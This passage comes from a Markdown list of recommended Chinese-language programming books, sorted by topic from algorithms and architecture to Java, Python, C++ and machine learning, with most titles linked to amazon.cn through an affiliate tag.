    * 《[软件调试的艺术](https://www.amazon.cn/gp/product/B00IOAM6VE/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00IOAM6VE&linkCode=as2&tag=vastwork-23)》
    * 《[修改代码的艺术](https://www.amazon.cn/gp/product/B00KMJ2Q1U/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00KMJ2Q1U&linkCode=as2&tag=vastwork-23)》
    * 《[编程语言实现模式](https://www.amazon.cn/gp/product/B007HYMPBY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007HYMPBY&linkCode=as2&tag=vastwork-23)》
    * 《[编写可读代码的艺术](https://www.amazon.cn/gp/product/B008B4DTG4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008B4DTG4&linkCode=as2&tag=vastwork-23)》
    * 《解析极限编程:拥抱变化》
    * 《[精通正则表达式(第3版)](https://www.amazon.cn/gp/product/B008UCHA58/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008UCHA58&linkCode=as2&tag=vastwork-23)》
    * 《[编译原理(第2版)](https://www.amazon.cn/gp/product/B001NGO85I/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B001NGO85I&linkCode=as2&tag=vastwork-23)》龙书
    * 《[重构:改善既有代码的设计](https://www.amazon.cn/gp/product/B011LPUB42/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B011LPUB42&linkCode=as2&tag=vastwork-23)》
    * 《[七周七语言:理解多种编程范型](https://www.amazon.cn/gp/product/B00ALPRM3M/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ALPRM3M&linkCode=as2&tag=vastwork-23)》
    * 《[调试九法:软硬件错误的排查之道](https://www.amazon.cn/gp/product/B00CBBLUFK/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00CBBLUFK&linkCode=as2&tag=vastwork-23)》
    * 《程序设计语言:实践之路(第3版)》
    * 《[计算的本质:深入剖析程序和计算机](https://www.amazon.cn/gp/product/B00PG0MM3C/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00PG0MM3C&linkCode=as2&tag=vastwork-23)》
    * 《[设计模式 : 可复用面向对象软件的基础](https://www.amazon.cn/gp/product/B001130JN8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B001130JN8&linkCode=as2&tag=vastwork-23)》

    ## 算法与数据结构

    * 《[算法(第4版)](https://www.amazon.cn/gp/product/B009OCFQ0O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B009OCFQ0O&linkCode=as2&tag=vastwork-23)》
    * 《[算法导论(原书第2版)](https://www.amazon.cn/gp/product/B00AK7BYJY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00AK7BYJY&linkCode=as2&tag=vastwork-23)》
    * 《[Python算法教程](https://www.amazon.cn/gp/product/B019NB0VCI/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B019NB0VCI&linkCode=as2&tag=vastwork-23)》
    * 《[算法设计与分析基础(第3版)](https://www.amazon.cn/gp/product/B00S4HCQUI/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00S4HCQUI&linkCode=as2&tag=vastwork-23)》
    * 《[学习 JavaScript 数据结构与算法](https://www.amazon.cn/gp/product/B016DWSF8M/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B016DWSF8M&linkCode=as2&tag=vastwork-23)》
    * 《[数据结构与算法分析 : C++描述(第4版)](https://www.amazon.cn/gp/product/B01LDG2DSG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01LDG2DSG&linkCode=as2&tag=vastwork-23)》
    * 《[数据结构与算法分析 : C语言描述(第2版)](https://www.amazon.cn/gp/product/B002WC7NGS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B002WC7NGS&linkCode=as2&tag=vastwork-23)》
    * 《[数据结构与算法分析 : Java语言描述(第2版)](https://www.amazon.cn/gp/product/B01CNP0CG6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01CNP0CG6&linkCode=as2&tag=vastwork-23)》

    ## 职业修炼与规划

    * 《[大教堂与集市](https://www.amazon.cn/gp/product/B00KQDTZ4S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00KQDTZ4S&linkCode=as2&tag=vastwork-23)》
    * 《卓有成效的程序员》
    * 《[程序员的职业素养](https://www.amazon.cn/gp/product/B01LZJ8L9J/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01LZJ8L9J&linkCode=as2&tag=vastwork-23)》
    * 《[程序员修炼之道:从小工到专家](https://www.amazon.cn/gp/product/B004GV08CY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004GV08CY&linkCode=as2&tag=vastwork-23)》
    * 《[软件开发者路线图:从学徒到高手](https://www.amazon.cn/gp/product/B00H6X6LD4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00H6X6LD4&linkCode=as2&tag=vastwork-23)》
    * 《[我编程,我快乐: 程序员职业规划之道](https://www.amazon.cn/gp/product/B00CBBKDGM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00CBBKDGM&linkCode=as2&tag=vastwork-23)》
    * 《[程序员的思维修炼:开发认知潜能的九堂课](https://www.amazon.cn/gp/product/B007VARUIM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007VARUIM&linkCode=as2&tag=vastwork-23)》
    * 《[高效程序员的45个习惯:敏捷开发修炼之道(修订版)](https://www.amazon.cn/gp/product/B00OA9L3NU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00OA9L3NU&linkCode=as2&tag=vastwork-23)》

    ## 大师访谈

    * 《[编程大师智慧](https://www.amazon.cn/gp/product/B00451BP72/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00451BP72&linkCode=as2&tag=vastwork-23)》
    * 《[编程大师访谈录](https://www.amazon.cn/gp/product/B00ALPRKMA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ALPRKMA&linkCode=as2&tag=vastwork-23)》
    * 《[编程人生 : 15位软件先驱访谈录](https://www.amazon.cn/gp/product/B00QA7GA2Y/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00QA7GA2Y&linkCode=as2&tag=vastwork-23)》
    * 《[奇思妙想 : 15位计算机天才及其重大发现](https://www.amazon.cn/gp/product/B007ED88CI/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007ED88CI&linkCode=as2&tag=vastwork-23)》
    * 《[图灵和ACM图灵奖](https://www.amazon.cn/gp/product/B008G80O9K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008G80O9K&linkCode=as2&tag=vastwork-23)》

    ## 架构/性能

    * 《[微服务设计](https://www.amazon.cn/gp/product/B01ER75V6O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01ER75V6O&linkCode=as2&tag=vastwork-23)》
    * 《[大数据日知录](https://www.amazon.cn/gp/product/B00NGW4EAG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00NGW4EAG&linkCode=as2&tag=vastwork-23)》
    * 《[企业应用架构模式](https://www.amazon.cn/gp/product/B003LBSRDM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B003LBSRDM&linkCode=as2&tag=vastwork-23)》
    * 《[Web性能权威指南](https://www.amazon.cn/gp/product/B00JMKWHFU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00JMKWHFU&linkCode=as2&tag=vastwork-23)》
    * 《[SRE:Google运维解密](https://www.amazon.cn/gp/product/B01M0EHQ43/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01M0EHQ43&linkCode=as2&tag=vastwork-23)》
    * 《[发布!软件的设计与部署](https://www.amazon.cn/gp/product/B0153178XM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0153178XM&linkCode=as2&tag=vastwork-23)》
    * 《[高扩展性网站的 50 条原则](https://www.amazon.cn/gp/product/B01HZFHQQI/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01HZFHQQI&linkCode=as2&tag=vastwork-23)》
    * 《[大型网站技术架构:核心原理与案例分析](https://www.amazon.cn/gp/product/B00F3Z26G8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00F3Z26G8&linkCode=as2&tag=vastwork-23)》
    * 《[恰如其分的软件架构:风险驱动的设计方法](https://www.amazon.cn/gp/product/B00EP6TGAU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00EP6TGAU&linkCode=as2&tag=vastwork-23)》
    * 《[软件系统架构:使用视点和视角与利益相关者合作(第2版)](https://www.amazon.cn/gp/product/B00CMMUXC4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00CMMUXC4&linkCode=as2&tag=vastwork-23)》

    ## Web front end

    * 《[高性能 JavaScript](https://www.amazon.cn/gp/product/B013SGB2AO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B013SGB2AO&linkCode=as2&tag=vastwork-23)》
    * 《[锋利的 jQuery(第2版)](https://www.amazon.cn/gp/product/B0089TDFNS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0089TDFNS&linkCode=as2&tag=vastwork-23)》
    * 《[JavaScript 忍者秘籍](https://www.amazon.cn/gp/product/B016DWSEWO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B016DWSEWO&linkCode=as2&tag=vastwork-23)》 (thanks to [@joker-danta](https://github.com/jobbole/awesome-programming-books/issues?q=is%3Aissue+is%3Aopen+author%3Ajoker-danta) for the additional recommendation)
    * 《[编写可维护的 JavaScript](https://www.amazon.cn/gp/product/B00BQ7RMW0/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00BQ7RMW0&linkCode=as2&tag=vastwork-23)》
    * 《[你不知道的 JavaScript(上)](https://www.amazon.cn/gp/product/B00W34DZ8K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00W34DZ8K&linkCode=as2&tag=vastwork-23)》
    * 《[JavaScript 权威指南(第6版)](https://www.amazon.cn/gp/product/B007VISQ1Y/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007VISQ1Y&linkCode=as2&tag=vastwork-23)》
    * 《[JavaScript 语言精粹(修订版)](https://www.amazon.cn/gp/product/B0097CON2S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0097CON2S&linkCode=as2&tag=vastwork-23)》
    * 《[JavaScript DOM编程艺术 (第2版)](https://www.amazon.cn/gp/product/B004VJM5KE/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004VJM5KE&linkCode=as2&tag=vastwork-23)》
    * 《[JavaScript 高级程序设计(第3版)](https://www.amazon.cn/gp/product/B007OQQVMY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007OQQVMY&linkCode=as2&tag=vastwork-23)》
    * 《[JavaScript 异步编程:设计快速响应的网络应用](https://www.amazon.cn/gp/product/B00JVLEYY2/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00JVLEYY2&linkCode=as2&tag=vastwork-23)》
    * 《[Effective JavaScript:编写高质量JavaScript代码的68个有效方法](https://www.amazon.cn/gp/product/B00GMXI1QY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00GMXI1QY&linkCode=as2&tag=vastwork-23)》
    * 《[HTML5 权威指南](https://www.amazon.cn/gp/product/B00H706BIG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00H706BIG&linkCode=as2&tag=vastwork-23)》
    * 《[HTML5 秘籍(第2版)](https://www.amazon.cn/gp/product/B015316VJY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B015316VJY&linkCode=as2&tag=vastwork-23)》
    * 《[HTML5 与 CSS3 基础教程(第八版)](https://www.amazon.cn/gp/product/B00K58535O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00K58535O&linkCode=as2&tag=vastwork-23)》
    * 《[CSS 揭秘](https://www.amazon.cn/gp/product/B01ET3FO86/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01ET3FO86&linkCode=as2&tag=vastwork-23)》
    * 《[CSS 设计指南(第3版)](https://www.amazon.cn/gp/product/B00M2DKZ1W/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00M2DKZ1W&linkCode=as2&tag=vastwork-23)》
    * 《[CSS 权威指南(第3版)](https://www.amazon.cn/gp/product/B0011F5SIC/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011F5SIC&linkCode=as2&tag=vastwork-23)》
    * 《[深入浅出 HTML 与 CSS](https://www.amazon.cn/gp/product/B01LXL42O5/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01LXL42O5&linkCode=as2&tag=vastwork-23)》

    ## Java development

    * 《[Java8 实战](https://www.amazon.cn/gp/product/B01ER75QC8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01ER75QC8&linkCode=as2&tag=vastwork-23)》
    * 《[Java并发编程实战](https://www.amazon.cn/gp/product/B0077K9XHW/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0077K9XHW&linkCode=as2&tag=vastwork-23)》
    * 《[Java性能权威指南](https://www.amazon.cn/gp/product/B01DLB7Z66/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01DLB7Z66&linkCode=as2&tag=vastwork-23)》
    * 《[Java程序员修炼之道](https://www.amazon.cn/gp/product/B00E0D2OX4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00E0D2OX4&linkCode=as2&tag=vastwork-23)》
    * 《[实战Java高并发程序设计](https://www.amazon.cn/gp/product/B017MEN094/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B017MEN094&linkCode=as2&tag=vastwork-23)》
    * 《[Java编程思想 (第4版)](https://www.amazon.cn/gp/product/B0011F7WU4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011F7WU4&linkCode=as2&tag=vastwork-23)》
    * 《[深入理解Java虚拟机(第2版)](https://www.amazon.cn/gp/product/B01HI0BUF8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01HI0BUF8&linkCode=as2&tag=vastwork-23)》
    * 《[Effective java 中文版(第2版)](https://www.amazon.cn/gp/product/B001PTGR52/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B001PTGR52&linkCode=as2&tag=vastwork-23)》
    * 《[Java核心技术·卷1:基础知识(原书第9版)](https://www.amazon.cn/gp/product/B01M22BGUQ/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01M22BGUQ&linkCode=as2&tag=vastwork-23)》
    * 《[Java核心技术·卷2:高级特性(原书第9版)](https://www.amazon.cn/gp/product/B00IK7SM6O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00IK7SM6O&linkCode=as2&tag=vastwork-23)》

    ## .NET

    * 《[精通C#(第6版)](https://www.amazon.cn/gp/product/B00DVDDP0K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00DVDDP0K&linkCode=as2&tag=vastwork-23)》
    * 《[深入理解C#(第3版)](https://www.amazon.cn/gp/product/B00J94AG2A/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00J94AG2A&linkCode=as2&tag=vastwork-23)》
    * 《[CLR via C#(第4版)](https://www.amazon.cn/gp/product/B00P8VZ8T4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00P8VZ8T4&linkCode=as2&tag=vastwork-23)》

    ## Python

    * 《[集体智慧编程](https://www.amazon.cn/gp/product/B00UI93JD8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00UI93JD8&linkCode=as2&tag=vastwork-23)》
    * 《[笨办法学Python](https://www.amazon.cn/gp/product/B00P6OJ0TC/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00P6OJ0TC&linkCode=as2&tag=vastwork-23)》
    * 《[Python基础教程](https://www.amazon.cn/gp/product/B00KAFX65Q/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00KAFX65Q&linkCode=as2&tag=vastwork-23)》
    * 《Python源码剖析》
    * 《[Head First Python](https://www.amazon.cn/gp/product/B007NB2B4M/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007NB2B4M&linkCode=as2&tag=vastwork-23)》
    * 《[与孩子一起学编程](https://www.amazon.cn/gp/product/B00HECW20S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00HECW20S&linkCode=as2&tag=vastwork-23)》
    * 《[Python学习手册(第4版)](https://www.amazon.cn/gp/product/B004TUJ7A6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004TUJ7A6&linkCode=as2&tag=vastwork-23)》
    * 《[Python Cookbook(第3版)](https://www.amazon.cn/gp/product/B00WKR1OKG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00WKR1OKG&linkCode=as2&tag=vastwork-23)》
    * 《[Python参考手册(第4版)](https://www.amazon.cn/gp/product/B01MCUN37Y/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01MCUN37Y&linkCode=as2&tag=vastwork-23)》
    * 《[Python核心编程(第3版)](https://www.amazon.cn/gp/product/B01FQAS0KK/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01FQAS0KK&linkCode=as2&tag=vastwork-23)》
    * 《[Python科学计算(第2版)](https://www.amazon.cn/gp/product/B01HCVUJFA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01HCVUJFA&linkCode=as2&tag=vastwork-23)》
    * 《[利用 Python 进行数据分析](https://www.amazon.cn/gp/product/B00GHGZLWS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00GHGZLWS&linkCode=as2&tag=vastwork-23)》
    * 《[Think Python:像计算机科学家一样思考Python(第2版)](https://www.amazon.cn/gp/product/B01ION3W54/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01ION3W54&linkCode=as2&tag=vastwork-23)》
    * 《[Python编程实战:运用设计模式、并发和程序库创建高质量程序](https://www.amazon.cn/gp/product/B00MHDPIJ6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00MHDPIJ6&linkCode=as2&tag=vastwork-23)》
    * 《[Python绝技:运用Python成为顶级黑客](https://www.amazon.cn/gp/product/B019ZRGBVU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B019ZRGBVU&linkCode=as2&tag=vastwork-23)》
    * 《[Flask Web开发:基于Python的Web应用开发实战](https://www.amazon.cn/gp/product/B0153177A6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0153177A6&linkCode=as2&tag=vastwork-23)》

    ## Android

    * 《[Android编程权威指南(第2版)](https://www.amazon.cn/gp/product/B01FSXCBOQ/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01FSXCBOQ&linkCode=as2&tag=vastwork-23)》
    * 《[移动应用UI设计模式(第2版)](https://www.amazon.cn/gp/product/B00SFZGX08/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00SFZGX08&linkCode=as2&tag=vastwork-23)》

    ## iOS

    * 《[iOS编程实战](https://www.amazon.cn/gp/product/B00NKZCM3U/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00NKZCM3U&linkCode=as2&tag=vastwork-23)》
    * 《[iOS编程(第4版)](https://www.amazon.cn/gp/product/B013UG2ULW/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B013UG2ULW&linkCode=as2&tag=vastwork-23)》
    * 《[Objective-C高级编程](https://www.amazon.cn/gp/product/B00DE60G3S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00DE60G3S&linkCode=as2&tag=vastwork-23)》
    * 《[Effective Objective-C 2.0:编写高质量iOS与OS X代码的52个有效方法](https://www.amazon.cn/gp/product/B00IDSGY06/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00IDSGY06&linkCode=as2&tag=vastwork-23)》

    ## PHP

    * 《[Head First PHP & MySQL(中文版)](https://www.amazon.cn/gp/product/B004R1QIJU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004R1QIJU&linkCode=as2&tag=vastwork-23)》
    * 《[深入PHP:面向对象、模式与实践(第3版)](https://www.amazon.cn/gp/product/B005D6IRRY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B005D6IRRY&linkCode=as2&tag=vastwork-23)》

    ## C language

    * 《[C标准库](https://www.amazon.cn/gp/product/B00IZW4DK8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00IZW4DK8&linkCode=as2&tag=vastwork-23)》
    * 《[C和指针](https://www.amazon.cn/gp/product/B00163LU68/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00163LU68&linkCode=as2&tag=vastwork-23)》
    * 《[C专家编程](https://www.amazon.cn/gp/product/B0012NIW9K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0012NIW9K&linkCode=as2&tag=vastwork-23)》
    * 《[C陷阱与缺陷](https://www.amazon.cn/gp/product/B0012UMPBY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0012UMPBY&linkCode=as2&tag=vastwork-23)》
    * 《[C语言接口与实现](https://www.amazon.cn/gp/product/B01D10NSCM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01D10NSCM&linkCode=as2&tag=vastwork-23)》
    * 《[C程序设计语言(第2版)](https://www.amazon.cn/gp/product/B0011425T8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011425T8&linkCode=as2&tag=vastwork-23)》
    * 《C语言参考手册(第5版)》

    ## C++

    * 《[C++标准库](https://www.amazon.cn/gp/product/B00YLZIRHI/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00YLZIRHI&linkCode=as2&tag=vastwork-23)》
    * 《[C++编程思想](https://www.amazon.cn/gp/product/B005CFUQR0/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B005CFUQR0&linkCode=as2&tag=vastwork-23)》
    * 《C++语言的设计与演化》
    * 《[C++程序设计原理与实践](https://www.amazon.cn/gp/product/B003VPX6YS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B003VPX6YS&linkCode=as2&tag=vastwork-23)》
    * 《[C++ Primer (中文第5版)](https://www.amazon.cn/gp/product/B00ESUIL0O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ESUIL0O&linkCode=as2&tag=vastwork-23)》
    * 《[C++ Primer习题集(第5版)](https://www.amazon.cn/gp/product/B00S6U4C6E/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00S6U4C6E&linkCode=as2&tag=vastwork-23)》
    * 《[C++程序设计语言(第1-3部分)(原书第4版)](https://www.amazon.cn/gp/product/B01I9BNASA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01I9BNASA&linkCode=as2&tag=vastwork-23)》
    * 《[Effective C++:改善程序与设计的55个具体做法(第3版)(中文版)](https://www.amazon.cn/gp/product/B004G72P24/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004G72P24&linkCode=as2&tag=vastwork-23)》
    * 《[More Effective C++:35个改善编程与设计的有效方法(中文版)](https://www.amazon.cn/gp/product/B004IP8BD6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004IP8BD6&linkCode=as2&tag=vastwork-23)》

    ## Machine learning and data mining

    * 《[数据之巅](https://www.amazon.cn/gp/product/B00JUE9DXW/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00JUE9DXW&linkCode=as2&tag=vastwork-23)》
    * 《[矩阵分析](https://www.amazon.cn/gp/product/B00NTM5GK0/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00NTM5GK0&linkCode=as2&tag=vastwork-23)》
    * 《[机器学习](https://www.amazon.cn/gp/product/B002WC7NH2/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B002WC7NH2&linkCode=as2&tag=vastwork-23)》
    * 《[统计学习方法](https://www.amazon.cn/gp/product/B007TSFMTA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007TSFMTA&linkCode=as2&tag=vastwork-23)》
    * 《[机器学习导论](https://www.amazon.cn/gp/product/B01AG3ZV9K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01AG3ZV9K&linkCode=as2&tag=vastwork-23)》
    * 《[推荐系统实践](https://www.amazon.cn/gp/product/B008AK5YJO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008AK5YJO&linkCode=as2&tag=vastwork-23)》
    * 《[机器学习实战](https://www.amazon.cn/gp/product/B00D747PTK/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00D747PTK&linkCode=as2&tag=vastwork-23)》
    * 《[Web数据挖掘](https://www.amazon.cn/gp/product/B00AY830HS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00AY830HS&linkCode=as2&tag=vastwork-23)》
    * 《[深入浅出统计学](https://www.amazon.cn/gp/product/B006PHIVNA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B006PHIVNA&linkCode=as2&tag=vastwork-23)》
    * 《[模式分类(第2版)](https://www.amazon.cn/gp/product/B00116C3DY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00116C3DY&linkCode=as2&tag=vastwork-23)》
    * 《[概率论与数理统计](https://www.amazon.cn/gp/product/B00264GG56/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00264GG56&linkCode=as2&tag=vastwork-23)》
    * 《[统计学习基础(第2版)(英文)](https://www.amazon.cn/gp/product/B00PRH2BXA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00PRH2BXA&linkCode=as2&tag=vastwork-23)》
